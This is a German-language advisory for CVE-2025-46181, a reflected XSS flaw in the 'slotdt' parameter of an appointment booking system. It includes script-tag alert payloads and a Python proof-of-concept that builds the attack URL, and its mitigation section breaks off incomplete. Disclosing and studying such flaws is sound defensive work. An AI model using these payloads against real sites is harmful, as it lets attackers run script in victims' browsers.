
Offenlegung einer reflektierten XSS-Schwachstelle mit PoC-Skript und Abhilfeanleitung für ein Online-Terminbuchungssystem. Enthält Analyse anfälliger Parameter und Auswirkungsbewertung.
CVE-ID: CVE-2025-46181
Entdeckt von: Shemkumar P (shemkumar.github.io)
Schwachstellentyp: Reflected Cross-Site Scripting (XSS)
Schweregrad: Mittel
Status: Offengelegt, CVE von MITRE zugewiesen
Eine Reflected Cross-Site Scripting (XSS)-Schwachstelle existiert in einem öffentlichen Online-Terminbuchungssystem (v1.0), insbesondere auf der Seite, die die Terminbestätigung verarbeitet. Ein GET-Parameter bereinigt die Eingabe nicht ordnungsgemäß, was JavaScript-Injection und Codeausführung im Browser des Opfers ermöglicht.
GET /confirmapp.php?slotdt=<payload>
Beispiel-Payload (kodiert):
<script>alert("XSS")</script>
<script>alert("You have been hijacked")</script>
🚫 Live-Link aus ethischen Gründen geschwärzt. Diese Schwachstelle wurde in einer kontrollierten Umgebung getestet.
import requests
from urllib.parse import quote
base_url = "https://[REDACTED]/confirmapp.php"
payload = '<script>alert("XSS triggered")</script>'
params = {
'fullname': 'test',
'mobile': '9999999999',
'emailid': '[email protected]',
'slotdt': payload,
'slottime': '11:00:00',
'doctorid': '2'
}
encoded = '&'.join(f"{k}={quote(str(v))}" for k, v in params.items())
print("Test URL (use only in authorized test environments):")
print(f"{base_url}?{encoded}")
Die Anwendung sollte:
htmlspecialchars() in PHPShemkumar P
🕸️ shemkumar.github.io
🔐 Cybersecurity-Forscher | CTF-Enthusiast | CVE-Reporter
⚠️ Diese Veröffentlichung dient ausschließlich Bildungs- und Verteidigungszwecken. Das Testen oder Ausnutzen von Schwachstellen auf Systemen, die Ihnen nicht gehören oder für die Sie keine ausdrückliche Genehmigung haben, ist illegal und unethisch.